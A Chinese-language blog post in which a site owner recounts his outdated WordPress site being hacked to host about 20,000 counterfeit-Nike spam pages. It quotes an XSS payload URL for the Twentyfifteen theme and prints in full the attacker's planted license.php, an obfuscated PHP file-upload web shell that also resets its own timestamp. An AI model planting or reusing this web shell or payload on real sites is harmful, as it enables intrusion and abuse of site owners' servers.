网络上现在黑客行为无处不在,大公司也鲜有幸免者,频频被脱裤。前段时间Magento曝出高危漏洞,还有Wordpress的插件WordPress SEO by Yoast曝出存在SQL注入漏洞,今天看到Wordpress的默认主题竟然也存在着跨站脚本漏洞:
http:// site.com/wp-content/themes/twentyfifteen/genericons/example.html#1<img/ src=1 onerror= alert(1)>
于是前几天Alan的一个英文Wordpress站点也被攻击了,这个博客将近半年多没有打理,想必是未及时升级被人利用了之前的漏洞进行攻击。其实人在江湖谁能不挨刀呢,最让我无语的是这个黑客竟然上传了近两万个文件(html+js),差不多有两个G,这个站点布置在一个低配置的GoDaddy主机上,于是删文件花了我两个多小时。看来现在黑客也不好混呀,抓住一个就疯狂的掠夺。
文件都是一些Nike之类的仿牌,本人也不屑于去投诉什么的,做仿牌的也是苦海无涯啊,做大了就更麻烦了。
话说这个攻击就是利用漏洞在根目录添加了一个license.php文件,其实也就是用于处理上传文件的一个php脚本,代码如下文。
另外Google的灵敏度还是挺赞的,今天就收到了一封标题为[Webmaster Tools] Hacking suspected:http://www.domain.com的邮件,估计这种黑帽SEO手段在国外早就没什么效果了吧。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 | <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-utf-8"> <title>utf</title> </head> <body> <?php print "<h1>#p@$c@#</h1>\n"; echo "Your IP: "; echo $_SERVER['REMOTE_ADDR']; echo "<form method=\"post\" enctype=\"multipart/form-data\">\n"; echo "<input type=\"file\" name=\"filename\"><br> \n"; echo "<input type=\"submit\" value=\"LOAD\"><br>\n"; echo "</form>\n"; if(is_uploaded_file/*;*/($_FILES["filename"]["tmp_name"])) { move_uploaded_file/*;*/($_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"]); $file = $_FILES/*;*/["filename"]["name"]; echo "<a href=\"$file\">$file</a>"; } else { echo("empty"); } $filename = $_SERVER[SCRIPT_FILENAME]; touch/*;*/($filename, $time); ?> </body></html> |
